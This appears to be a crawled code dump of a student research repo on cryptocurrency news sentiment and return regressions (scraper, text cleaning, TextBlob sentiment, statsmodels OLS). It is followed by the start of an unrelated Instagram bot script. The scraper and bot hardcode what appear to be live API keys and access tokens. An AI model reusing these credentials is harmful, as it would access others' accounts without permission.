formulas:\n\t\t\tspliced_df = df[df['formulas'] == formula].reset_index()\n\n\t\t\tbest_df.append(spliced_df.iloc[spliced_df['r_squareds'].idxmax()])\n\t\t\treturn best_df\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\t# results = listdir(f'results/return_predictions/{coin}')\n\tdependent_variable = 'volume'\n\tpath =f'results/{dependent_variable}_predictions/'\n\tpickle_names = listdir(path)\n\tplotter = plot_regression_results(dependent_variable = dependent_variable, save=True, show=False)\n\tplotter.main(pickle_names, path)" }, { "alpha_fraction": 0.7347466349601746, "alphanum_fraction": 0.7362978458404541, "avg_line_length": 34.83333206176758, "blob_id": "14523d90a99d311b2bc18fcee04ff70178e45b0f", "content_id": "335f0250d8c44f8212fe6f8e2ddc9857cd5731b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1934, "license_type": "no_license", "max_line_length": 168, "num_lines": 54, "path": "/analysis_scripts/get_regression_results.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from statsmodels.regression.linear_model import OLSResults\nfrom os import listdir\nimport pandas as pd \nfrom numpy import power\n'''This script is designed to take all the regression models generated by time_series_analysis.py\nand aggregate the macro results: R^2, standerd erros, etc. And put those macro results in a \nreadable form that can analyze the results of the regression'''\n\n\ndef main(models, coin, dependent_variable='return'):\n\t#models is the list of model names\n\tr_squareds = []\n\tcoefficients = []\n\tstanderd_errors = []\n\tresiduals = []\n\ttimes = []\n\tformulas = []\n\n\tfor model in models:\n\t\tresults = OLSResults.load(f'regression_models/{dependent_variable}_predictions/{coin}/{model}')\n\t\tr_squareds.append(results.rsquared)\n\t\t# coefficients.append(tuple(results.params))\n\t\t# standerd_errors.append(tuple(results.bse))\n\t\tcoefficients.append(results.params)\n\t\tstanderd_errors.append(results.bse)\n\t\tresiduals.append(results.df_resid)\n\t\ttimes.append(get_time(model))\n\t\tformulas.append(get_formula(model))\n\t#puts all the import variables into a dictinary\n\tmodel_dict = {'r_squareds': r_squareds, 'coefficients': coefficients, 'standerd_errors': standerd_errors, 'residuals': residuals, 'times': times, 'formulas': formulas}\n\n\tmodel_df = pd.DataFrame(model_dict, index=models).sort_values('r_squareds', ascending=False)\n\t\n\n\t\n\tmodel_df.to_pickle(f'results/{dependent_variable}_predictions/{coin}_model_results.pickle')\n\tprint(f'model saved to {coin}_model_results.pickle')\n\n\ndef get_time(model_name):\n\t'''gets the time for one model using the regex'''\n\treturn model_name.split('_')[-2]\n\ndef get_formula(model_name):\n\treturn ''.join(model_name.split()[:-1])\n\n\n\nif __name__ == '__main__':\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\tdependent_variable = 'volume'\n\tfor coin in coins:\n\t\tmodels = listdir(f'regression_models/{dependent_variable}_predictions/{coin}')\n\t\tmain(models, coin, dependent_variable=dependent_variable)" }, { "alpha_fraction": 0.6786597371101379, "alphanum_fraction": 0.6874485015869141, "avg_line_length": 29.350000381469727, "blob_id": "59c3b93f7bcf60f6f8c5fc289cd4af34e166d702", "content_id": "a81777a2e20eb0ffbd7d999a929558934061f72e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3641, "license_type": "no_license", "max_line_length": 214, "num_lines": 120, "path": "/scraper_scripts/news_scraper.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \nimport pickle\nimport requests\nfrom bs4 import BeautifulSoup\nfrom json import loads\n\nclass contextual_news_scraper:\n\t'''This program will use the Contexutual News API to download news articles given a key word and return a data frame with relevant information about the articless'''\n\tdef __init__(self, term, year, pages=1, start_month=1, end_month=13):\n\n\t\tself.pages = pages\n\t\tself.term = term\n\t\tself.year = year\n\n\t\t#lets you decide what month to start your search\n\t\tself.start_month = start_month\n\t\tself.end_month = end_month\n\n\tdef get_news_df(self):\n\t\t#establishing all the data points that we want to get \n\t\ttitles = []\n\t\tkeywords = []\n\t\turls = []\n\t\tlanguage = []\n\t\tpublishers = []\n\t\tdatetimes = []\n\t\tdescriptions = []\n\t\tbodies = []\n\n\t\t#Main loop of the function. will loop through all the months in the given year to get data\n\t\tfor month in range(self.start_month, self.end_month):\n\n\t\t\t#reads through all the pages on this given query\n\t\t\tfor page in range(self.pages):\t\n\n\t\t\t\ttry:\n\t\t\t\t\tresponse_json = self.get_json(page, month) #function call to the Search API itself\n\t\t\t\texcept:\n\t\t\t\t\tbreak #breaks from the loop and saves the values that we have\n\n\t\t\t\t#if the page has no information, we will move to the next one\n\t\t\t\tif len(response_json['value']) == 0:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\t\tfor value in response_json['value']:\n\t\t\t\t\t#putting titles in list\n\t\t\t\t\t\n\t\t\t\t\ttitles.append(value['title'])\n\t\t\t\t\tkeywords.append(value['keywords'])\n\t\t\t\t\turls.append(value['url'])\n\t\t\t\t\tlanguage.append(value['language'])\n\t\t\t\t\tpublishers.append(value['provider']['name'])\n\t\t\t\t\tdatetimes.append(value['datePublished'])\n\t\t\t\t\tdescriptions.append(value['description'])\n\t\t\t\t\tbodies.append(value['body'])\n\n\n\t\tdata_dict = {'title': titles, 'url': urls, 'language': language, 'keywords': keywords, 'publisher': publishers, 'date_published': datetimes,'article': bodies}\n\t\t\n\t\tnews_df = pd.DataFrame(data_dict)\n\n\n\t\treturn news_df\n\t\t\n\n\n\n\n\tdef get_json(self, page, month):\n\t\turl = \"https://contextualwebsearch-websearch-v1.p.rapidapi.com/api/Search/NewsSearchAPI\" #url to the contexual search api\n\n\t\t#QUERIES TO API\n\t\tif month == 12: #needs custom syntax for the month of december\n\t\t\tquerystring = {\"fromPublishedDate\":f\"{month}/01/{self.year}\",f\"toPublishedDate\":f\"{month}/31/{self.year}\", \"autoCorrect\":\"false\",\"pageNumber\":page,\"pageSize\":f\"{self.pages}\",\"q\":self.term,\"safeSearch\":\"false\"}\n\t\t\n\t\telse: #query to all months that are not december\n\t\t\tquerystring = {\"fromPublishedDate\":f\"{month}/01/{self.year}\",f\"toPublishedDate\":f\"{month+1}/01/{self.year}\", \"autoCorrect\":\"false\",\"pageNumber\":page,\"pageSize\":f\"{self.pages}\",\"q\":self.term,\"safeSearch\":\"false\"}\n\t\t\n\t\theaders = {\n\t\t 'x-rapidapi-host': \"contextualwebsearch-websearch-v1.p.rapidapi.com\",\n\t\t 'x-rapidapi-key': \"94ed915629msh28a8aee42e9c89dp1cdc6ejsn5fed886c6b11\"\n\t\t }\n\t\t\n\t\t#Returns the response page from the API\n\t\tresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n\t\n\t\t#converts response into json format\n\t\tresponse_json = loads(response.text)\n\n\t\tprint(response.headers)\n\n\t\treturn response_json\t\n\t\t\n\n\n\n\n\nif __name__ == '__main__':\n\n\n\n\tyears = [2018, 2019]\n\tcoins = ['bitcoin', 'ethereum', 'zcash', 'litecoin']\n\tstart_month = 1\n\tend_month = 13\n\t\n\tfor coin in coins:\n\n\t\tfor year in years:\n\n\t\t\tscraper = contextual_news_scraper(coin, year, pages=50, start_month=start_month, end_month=end_month) #initializes scraper\n\t\t\tnews_df = scraper.get_news_df() #scrapes data and return dataframe\n\n\t\t\toutfile_path = f'../data/news_data_updated/{year}_{coin}_dataframe.csv'\t#sets path of outfile\t\n\n\t\t\tnews_df.to_csv(outfile_path) #saves dataframe to csv file\n\n\t\t\tprint('News Data Frame sucessfully saved to disk!')" }, { "alpha_fraction": 0.7028347849845886, "alphanum_fraction": 0.7223851680755615, "avg_line_length": 26.675676345825195, "blob_id": "dda9242f8d4458a5f318307e8620112a3169a1a2", "content_id": "9fdf4150d81331bf4715fe2e4e7efa582d1a86a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1023, "license_type": "no_license", "max_line_length": 101, "num_lines": 37, "path": "/analysis_scripts/sentiment_analyzer.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "from textblob import TextBlob \nimport pandas as pd \n\ndef main(coin,year, infile, outfile):\n\n\tdf = pd.read_csv(infile)\n\n\t#applies the function to everysingle value in the column\n\tdf['sentiment_polarity'] = df['processed_titles'].apply(sentiment_analysis_polarity)\n\n\t#applies the function to everysingle value in the column\n\tdf['sentiment_subjectivity'] = df['processed_titles'].apply(sentiment_analysis_subjectivity)\n\n\tdf.to_csv(outfile)\n\n\n\ndef sentiment_analysis_polarity(df):\n\treturn TextBlob(df).sentiment.polarity\n\ndef sentiment_analysis_subjectivity(df):\n\treturn TextBlob(df).sentiment.subjectivity\n\n\n\n\nif __name__ == '__main__':\n\tyears = range(2018, 2020)\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\t\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\tprint(year,coin)\n\t\t\tinfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\n\t\t\t\n\t\t\tmain('coin', year, infile, outfile)" }, { "alpha_fraction": 0.7861396670341492, "alphanum_fraction": 0.8007580041885376, "avg_line_length": 64.92857360839844, "blob_id": "7b303c2bdfd039d9013ef4a698ea16d7a2f4ead5", "content_id": "0a21b754a2ba3f663fc816fb7753c981253f3b27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 273, "num_lines": 28, "path": "/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "# Cryptocurrency Analysis through NLP\n\nThis is my ongoing Research Senior Project at Cal Poly San Luis Obispo that I'm performing with Professor Pratish Patel and Professor Ziemowit Bednarek.\n\nAll code thus far has been written by me exclusively.\n\nThe main idea behind this project is to see if we can find any correlation between news articles written about a given cryptocurrency and the return on the currency itself. I gathered data for Bitcoin, Ethereum, Litecoin, and ZCash\n\nTo accomplish this, I first used the contextual News Search API (https://rapidapi.com/contextualwebsearch/api/web-search?endpoint=5b8644c1e4b09cbc25b00140) to gather news articles which have the given cryptocurrency mentioned in it. This data had the following information:\n\n1. Title of Article\n2. URL to Article\n3. Language\n4. Article Publisher\n5. Datetime Published (UTC time)\n6. The Article itself\n\nPrelimnary Analysis was already done to see if the sentiment of the article title (Calculated using the TextBlob Library) had any correlation to the returns. I used OLS in the Statsmodels Library to look for correlation, but no correlation was found.\n\nThe next steps of the project are as follows:\n1. See if/when the articles gathered were ever published to Twitter. (Completed) [Used GetOldTweets3 Library]\n2. Run the same analysis, but to see if the time published to Twitter is more impactful on the return, as Twitter has a larger audience to spread the article to more people have the ability to impact the price.\n3. Create more features from the dataset.\n a. Create Word Embeddings of all the article titles from the dataset.\n b. Use those Word Embeddings to K-Means Cluster the data to put the articles in meaningful classifactions\n4. Perform more OLS, and potentially other estimators to see if a correlation can be created with the new data.\n\nThis is an ongoing project \n" }, { "alpha_fraction": 0.6889259815216064, "alphanum_fraction": 0.7000556588172913, "avg_line_length": 28.423728942871094, "blob_id": "189ddec16f3e043f5aff0644e9c02a8ababdb63c", "content_id": "86dda2191cc29b66fa7f65008009a649e293bce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1797, "license_type": "no_license", "max_line_length": 159, "num_lines": 59, "path": "/text_cleaning_scripts/text_cleaning.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd \r\nimport numpy as np \r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.cluster import KMeans\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nimport re\r\nfrom gensim.utils import simple_preprocess\r\nfrom string import punctuation\r\nimport nltk\r\n\r\ndef main(year, coin, infile, outfile):\r\n\t'''This function will do the text preprocessing to our dataset. It will '''\r\n\r\n\r\n\r\n\t\r\n\tdf = pd.read_csv(infile)\r\n\r\n\tdf['processed_titles'] = df.title.apply(lambda x: x.lower())\r\n\r\n\r\n\t\r\n\r\n\t#this maps all punctuation to None, \r\n\ttable = str.maketrans('', '', punctuation)\r\n\r\n\t#with the table mapping punctuation to None, this will replace all punctuation with blanks\r\n\tdf.processed_titles = df.processed_titles.apply(lambda x: x.translate(table).split())\r\n\r\n\t#initializes the word lemmatizer\r\n\tlemmatizer = WordNetLemmatizer()\r\n\r\n\t#goes through and removes all stopwords from title, and also lemmatizes each word in the title\r\n\tdf.processed_titles = df.processed_titles.apply(lambda x: ' '.join([lemmatizer.lemmatize(word) for word in x if word not in set(stopwords.words('english'))]))\r\n\r\n\r\n\t#removes the <b> in the data set\r\n\tdf.processed_titles = df.processed_titles.replace(to_replace=r'\\<[^>]*\\>',value='', regex =True)\r\n \r\n\tdf.to_csv(outfile)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tyears = range(2017, 2020)\r\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\r\n\t\r\n\tfor year in years:\r\n\t\tfor coin in coins:\r\n\t\t\tprint(year, coin)\r\n\t\t\tinfile = f'../data/news_data_collected_01_2020/preprocessed_data/{year}/{year}_{coin}_dataframe.csv'\r\n\t\t\toutfile = f'../data/news_data_collected_01_2020/processed_data/{year}/{year}_{coin}_dataframe.csv'\r\n\r\n\t\t\t# print(stopwords.words('english'))\r\n\t\t\tmain(year, coin, infile, outfile)\r\n\r\n" }, { "alpha_fraction": 0.7582417726516724, "alphanum_fraction": 0.7653061151504517, "avg_line_length": 46.185184478759766, "blob_id": "9b22cb4ba278f0398eb57ee8304fea8ed4044c95", "content_id": "23d6a815ae6df5befda93c3afe9ed2658aa4a64c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 130, "num_lines": 27, "path": "/analysis_scripts/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#analysis Scripts\n\n##merge_news_and_minute.py\nScript merges the crypto data and the news data with a left outer join with the crypto minute data as the left database\n\n\n##sentiment_analyzer.py\nThis file takes the processed data files and calculates their sentiment polarity and subjectivity score using the TextBlob Library\n\n\n##OLS_regression_analysis.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. \nCalculates a linear regression model using the following formula syntax: \"y-hat ~ x1 + x2 + ... + xn\"\n\nRegressions I ran:\n1. log_return ~ sent_polarity\n2. log_return ~ sent_polarity + sent_polarity^2\n3. log_return ~ sent_polarity + sent_polarity^3\n4. log_return ~ sent_polarity + [high_sent_polarity] //dummy variable signifying sentiments of values higher than .5\n\n##get_regresssion_results.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. \nA script to view the regression model and saves it to a pickle file (saved python object)\n\n##plot_regression_results.py\n###Warning, this script is old, and the syntax isn't pretty. I will be touching it up in the near future. \nMakes a plot of the regression coefficients side by side to look for effectiveness.\n" }, { "alpha_fraction": 0.5961538553237915, "alphanum_fraction": 0.6346153616905212, "avg_line_length": 39.599998474121094, "blob_id": "c7d400654e9c2d59ffcf816db9a227bf6d430ab8", "content_id": "3ce2c7fc84594f3af2b66486537186a72aee01f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 208, "license_type": "no_license", "max_line_length": 104, "num_lines": 5, "path": "/util.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "def all_coins_all_years(*funcs, years=[2018,2019], coins = ['bitcoin','ethereum', 'zcash', 'litecoin']):\n\tfor year in years:\n\t\tfor coin in coins:\n\t\t\tfor func in funcs:\n\t\t\t\tfunc(coin = coin, year = year)\n\t\t\t\t\t" }, { "alpha_fraction": 0.7547445297241211, "alphanum_fraction": 0.7605839371681213, "avg_line_length": 56.08333206176758, "blob_id": "478939f6563d70f4d1f9f128628791ce374ac142", "content_id": "3f72918ea4265fb07f84268585f7ee1629ebbb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 685, "license_type": "no_license", "max_line_length": 194, "num_lines": 12, "path": "/text_cleaning_scripts/README.md", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "# Text Cleaning Scripts\n\n## text_cleaning.py\nThis file will be doing all the necessary preprocessing for a NLP type project. It does the following:\n\n1. removes all punctuation from the data\n2. removes stopwords from data (i.e. the, a, an, etc). Words that don't have any inherent meaning to them\n3. Lemmatizes the words. This changes past and future tenses to the present tense. (i.e decreasing -> decrease, increased -> increase, etc)\n4. removes HTML tags like <b>.\n\n## datetime_editor.py\nThis file converts all the datetime data into a usable format, and extracts meaningful information out of it, i.e. what day of the week it was published on, whether or not it was a weekend, etc.\n" }, { "alpha_fraction": 0.6978257298469543, "alphanum_fraction": 0.7079267501831055, "avg_line_length": 34.400001525878906, "blob_id": "1dbb8c04519737344d5294b4e094201fd6a30af0", "content_id": "c4c6cad83536fe1f48f9f5a5cd5fe4ef8873b1a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5841, "license_type": "no_license", "max_line_length": 272, "num_lines": 165, "path": "/analysis_scripts/ols_regression.py", "repo_name": "jshutler/crypto_analysis", "src_encoding": "UTF-8", "text": "#work with the dataframes in merged_dataframes\nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport seaborn as sn; sn.set()\nfrom sklearn.linear_model import LinearRegression\nfrom numpy import array, isnan, power\nimport statsmodels.api as sm \nfrom statsmodels.formula.api import ols\nfrom statistics import mean\n\n#i'll delete this later\n# pd.set_option('display.max_rows', None)\n# pd.options.display.max_rows\nclass regression_analyzer:\n\tdef __init__(self, year, coin, time=1, no_zeros=False, dependent_variable=None):\n\t\tself.year=year\n\t\tself.coin=coin\n\t\t#refers to how many minutes ahead we want to try to predict the return\n\t\tself.time=time\n\t\t#removes all the zeroes from the dataframe\n\t\tif no_zeros:\n\t\t\tself.df = pd.read_csv(f'../dataframes/merged_dataframes/{year}_{coin}_merged_df.csv')\n\t\t\tself.df = self.df[self.df['sentiment_polarity'] != 0]\n\t\t\tself.df['Date'] = pd.to_datetime(self.df['Date'])\n\t\t#keeps the zeroes in the dataframe\n\t\telse:\n\t\t\tself.df = pd.read_csv(f'../dataframes/merged_dataframes/{year}_{coin}_merged_df.csv')\n\t\t\tself.df['Date'] = pd.to_datetime(self.df['Date'])\n\n\t\tself.df['high_sentiment'] = self.df['sentiment_polarity'].apply(lambda sentiment : 1 if sentiment > .8 else 0)\n\n\t\tself.dependent_variable = dependent_variable\n\tdef main(self):\n\t\tprint(self.df.columns)\n\t\t\n\n\tdef plot_sentiment_by_return(self):\n\t\t# plt.plot(self.df[f'{dependent_variable}'][::-1])\n\t\t# plt.scatter(range(len(self.df['sentiment_polarity'])), self.df['sentiment_polarity'][::-1])\n\t\tdf = self.df.dropna()\n\t\tplt.scatter(df['sentiment_polarity'], df[f'{self.dependent_variable}'][::-1])\n\t\tplt.show()\n\n\n\tdef run_regression(self, formula, save=False):\n\t\t#use aggregate if you want a rolling average for a period of time.\n\t\t#use shifted if you want direct implication of each article\n\t\tdf = self.aggregate_df()\n\t\ttry: \n\t\t\t#generate model\n\t\t\tmodel = ols(formula=formula, data=df)\n\t\texcept:\n\n\t\t\tprint('error: ')\n\t\t\tprint('formula: ', formula)\n\t\t\tprint(df)\n\t\t\traise('error with ols')\n\n\n\t\tresults = model.fit()\n\t\t\n\t\tprint(results.summary())\n\t\tprint(\"parameters\", results.params)\n\t\tprint(\"r^2\", results.rsquared)\n\n\t\tprint(results.params.index)\n\n\t\t#creates a model name based \n\t\t# model_name = '+'.join([variable for variable in list(results.params.index[1:])])\n\t\tif save:\n\t\t\tmodel_name = f'regression_models/{self.dependent_variable}_predictions/{self.coin}/{formula} {self.year}_{self.time}_minute.pickle'\n\t\t\tresults.save(model_name)\n\t\t\tprint(f'saved \"{model_name}.pickle\" saved to disk')\n\n\t\treturn results\n\n\n\tdef shift_df(self):\n\t\tdf = self.df.drop_duplicates('Date')\n\n\t\tlog_returns_shifted = df[[\"Date\", f\"{self.dependent_variable}\"]][self.time:].reset_index()\n\t\tprint('hit')\n\n\t\tsentiment_polarity_shifted = df[['Date', 'sentiment_polarity']][:-1*self.time]\n\n\n\t\tdf_dropped_nans = self.df.dropna()\n\n\t\tnew_df = log_returns_shifted.merge(sentiment_polarity_shifted, left_index=True, right_index=True).dropna()\n\n\tdef aggregate_df(self, df=[0], authors=None):\n\n\t\tif len(df) > 1:\n\t\t\t#if a df is given to the function, then we reassign df as a df with the authors\n\t\t\tprint(authors)\n\t\t\tdf = df[['Date', f'{self.dependent_variable}','sentiment_polarity', 'high_sentiment', 'publisher'] + authors].drop_duplicates('Date')\n\n\t\telse:\n\t\t\t#otherwise, we want the df to simply have these three columns\n\t\t\tdf = self.df[['Date', f'{self.dependent_variable}','sentiment_polarity', 'high_sentiment', 'publisher']].drop_duplicates('Date')\n\t\t\n\n\n\t\t#gets the articles released on the same and averages them\n\t\t#computes a rolling average based on the time attribute, which signifies how \n\t\t#many minutes in the future we want to find a prediction\n\t\t#the shift method will sihft the aggregate polarity to a location self.time units away\n\t\t#this will make it on the same row as the Closing Return that we want to run the regression against\n\t\tdf['aggregate_polarity'] = df['sentiment_polarity'].rolling(self.time, min_periods=1).mean().shift(-1*self.time+1)\n\t\t\n\t\t#if we've given the dataframe the extra author columns\n\t\tprint(len(df.columns))\n\t\tprint(df.columns)\n\t\tif len(df.columns) > 6:\n\t\t\tdf[authors] = df[authors].rolling(self.time, min_periods=1).sum().shift(-1*self.time+1)\n\n\t\t#gives you every element we want to know about\n\t\tdf = df.iloc[::self.time,:]\n\t\t\n\t\t#removes nas to reduce computational time\n\t\tdf = df[df['aggregate_polarity'].notna()]\n\n\t\treturn df\n\n\n\tdef get_author_dummy_variables(self):\n\t\tprint(self.df.columns)\n\n\t\t#gets me a list of all authors in the data set\n\t\tauthors = list(self.df['publisher'].drop_duplicates().dropna())\n\n\t\t#creates a data frame of dummy variables in the dataframe\n\t\tauthor_dummies =pd.get_dummies(self.df['publisher'])\n\n\n\t\tcombined = self.df.merge(author_dummies, left_index=True, right_index=True)\n\n\t\tprint(len(author_dummies))\n\t\tprint(len(self.df))\n\t\tprint(len(combined))\n\n\t\tprint(combined[authors].sum().sum())\n\t\tcrash=crash\n\t\t\n\t\treturn combined, author_dummies.columns\n\n\nif __name__ == '__main__':\n\t#currently dropping all articles that were released at the same minute.\n\t#time is in minutes: 1 = 1 minute shift; 60 minutes = 1 hour; 1440 minutes = 1 day\n\t# analyzer = regression_analyzer(2018, 'bitcoin', no_zeros=False, time=1)\n\t\t\n\tcoins = ['bitcoin', 'ethereum', 'Zcash', 'litecoin']\n\ttimes = [1,5,30,60,1440]\n\tyears = [2018, 2019]\n\t#should either be Volume, or log_returns\n\tdependent_variable = 'Volume'\n\t\n\tformulas = [f'{dependent_variable} ~ aggregate_polarity',f'{dependent_variable} ~ aggregate_polarity + power(aggregate_polarity, 2)', f'{dependent_variable} ~ aggregate_polarity + power(aggregate_polarity,3)',f'{dependent_variable} ~ aggregate_polarity + high_sentiment']\n\n\tfor formula in formulas:\n\t\tfor coin in coins:\n\t\t\tfor time in times:\n\t\t\t\tanalyzer = regression_analyzer(2019, coin, no_zeros=False, time=time, dependent_variable=dependent_variable)\n\t\t\t\tanalyzer.run_regression(formula=formula, save=True)\n" } ]
15
tarnjeetsingh/Instabot
https://github.com/tarnjeetsingh/Instabot
98d848e5565319fd8d6471ec3b6b44d68f0c278f
470b3cef34500f87d218098c6ec8a6eb4815a431
8c2c080f2d1602287e6ba107f3311d1eba4dbc5c
refs/heads/master
2020-12-02T20:56:42.441644
2017-07-24T16:18:05
2017-07-24T16:18:05
96,231,890
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6096649169921875, "alphanum_fraction": 0.6224441528320312, "avg_line_length": 48.36214828491211, "blob_id": "b4a6b8384e7ae987232b70843cbb8cf5d0859c24", "content_id": "ca59c69609f66013fe62e647127c3e3d24655db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21128, "license_type": "no_license", "max_line_length": 124, "num_lines": 428, "path": "/instabot.py", "repo_name": "tarnjeetsingh/Instabot", "src_encoding": "UTF-8", "text": "import requests\nimport urllib\nfrom textblob import TextBlob\nfrom textblob.sentiments import NaiveBayesAnalyzer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Acess token of the user\napp_access_token = '1552927974.120ce8d.08ca68409d6745a7867e181ceea6bb00'\napp_access_token1 = '5716224141.120ce8d.c167843111af45c299db71bed6bb0cb2'\n# Base url for instagram API\nbase = 'https://api.instagram.com/v1/'\n\n# Creating a function to start our INSTABOT\ndef start_bot():\n show_menu = True\n # Loop to show the choice menu again and again\n while show_menu:\n menu_choices = \"What do you want to do? \\n1. Get information about yourself \\n\" \\\n \"2. Get the user id of the instagrammer \\n\" \\\n \"3. Get information about a particular instagrammar \\n\" \\\n \"4. Get most recent post by yourself \\n\" \\\n \"5. Get most recent post of an Instagrammar \\n\" \\\n \"6. Get the recently liked media by yourself \\n\" \\\n \"7. Like a post \\n\" \\\n \"8. Get list of comment on a post \\n\" \\\n \"9. Comment on a post \\n\" \\\n \"10. delete negative comments from a post \\n\" \\\n \"11. Get user interests \\n\" \\\n \"12. Close the application\"\n menu_choice = raw_input(menu_choices)\n # Exception handling is employed for the validation of the choice\n try:\n menu_choice = int(menu_choice)\n # Option to obtain information about yourself\n if menu_choice == 1:\n self_info()\n # Option to get user id of an instagrammar\n elif menu_choice == 2:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_id(username)\n # Option to get information about an instagrammar\n elif menu_choice == 3:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_info(username)\n # Option to the most recent post of yourself\n elif menu_choice == 4:\n get_own_post()\n # Option to get most recent post of an instagrammar\n elif menu_choice == 5:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_post(username)\n # Option to get most recently liked media by the user\n elif menu_choice == 6:\n get_own_likes()\n # Option to like the most recent post of an instagrammar\n elif menu_choice == 7:\n username = raw_input(\"please enter username of the instagrammar\")\n like_a_post(username)\n # Option to get list of comments on post of an instagrammar\n elif menu_choice == 8:\n username = raw_input(\"please enter username of the instagrammar\")\n get_comments_on_post(username)\n # Option to post a comment on most recent post of an instagrammar\n elif menu_choice == 9:\n username = raw_input(\"please enter username of the instagrammar\")\n post_a_comment(username)\n # Option to delete the negative comments from the most recent post of an instagrammar\n elif menu_choice == 10:\n username = raw_input(\"please enter username of the instagrammar\")\n delete_negative_comment(username)\n # Option to close the INSTABOT\n elif menu_choice == 11:\n username = raw_input(\"please enter username of the instagrammar\")\n get_user_interests(username)\n elif menu_choice == 12:\n show_menu = False\n\n # piece of code to be executed if niether of the above conditions are met\n elif menu_choice > 11 or menu_choice < 1:\n print 'Please enter a valid choice from the options listed above'\n except ValueError:\n print 'Invalid value entered'\n print 'Please enter a valid choice'\n\n# Function to get self info about the user\ndef self_info():\n # Creating request url for self info\n request_url = (base+'users/self/?access_token=%s') % (app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_info = requests.get(request_url).json()\n\n # If the status code is 200 i.e sucess\n if user_info['meta']['code']==200:\n # Check if the data exists in the json object\n if len(user_info['data']):\n # Printing name of user, followers, following, number of posts\n print 'Username: %s' % (user_info['data']['username'])\n print 'No. of followers: %s' % (user_info['data']['counts']['followed_by'])\n print 'No. of people you are following: %s' % (user_info['data']['counts']['follows'])\n print 'No. of posts: %s' % (user_info['data']['counts']['media'])\n # If user_info object contains no data then printing the message\n else:\n print 'User does not exist!'\n # If the status code other than 200 is received then printing the appropriate message\n else:\n print 'Status code other than 200 received!'\n\n# Function to get user id of a instagram user by passing the username of instagram user as the parameter\ndef get_user_id(insta_username):\n # Making the request url by using API and joining access token with it\n request_url = (base+'users/search?q=%s&access_token=%s') % (insta_username, app_access_token)\n # Printing the request url\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_info['meta']['code'] == 200:\n # Checking if user_info object contains data\n if len(user_info['data']):\n return user_info['data'][0]['id']\n # Printing message if there is no data in json object\n else:\n print 'No user id found'\n return None\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n exit()\n\n# Function to get information about a user by passing the username of the instagram user as a parameter\ndef get_user_info(insta_username):\n # Using get user id function to get the user of the user\n user_id = get_user_id(insta_username)\n # If no user id with such username exists then printing appropriate message\n if user_id == None:\n print 'User does not exist!'\n exit()\n # Otherwise formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/%s?access_token=%s') % (user_id, app_access_token)\n print 'GET request url : %s' % (request_url)\n # Hitting the url and using the json function to decode the object and storing it in user_info\n user_info = requests.get(request_url).json()\n # Checking if the status code is 200 i.e success\n if user_info['meta']['code'] == 200:\n # Check if the data exists in the json object\n if len(user_info['data']):\n # Printing name of user, followers, following, number of posts\n print 'Username: %s' % (user_info['data']['username'])\n print 'No. of followers: %s' % (user_info['data']['counts']['followed_by'])\n print 'No. of people you are following: %s' % (user_info['data']['counts']['follows'])\n print 'No. of posts: %s' % (user_info['data']['counts']['media'])\n # If user_info object contains no data then printing the message\n else:\n print 'There is no data for this user!'\n # Printing an appropriate message if the status code other than 200 is received\n else:\n print 'Status code other than 200 received!'\n\n# Function to get the most recent post of user itself\ndef get_own_post():\n # Formalise the request url using the instagram API and attaching the access token with it\n request_url = (base+ 'users/self/media/recent/?access_token=%s') % (app_access_token)\n print 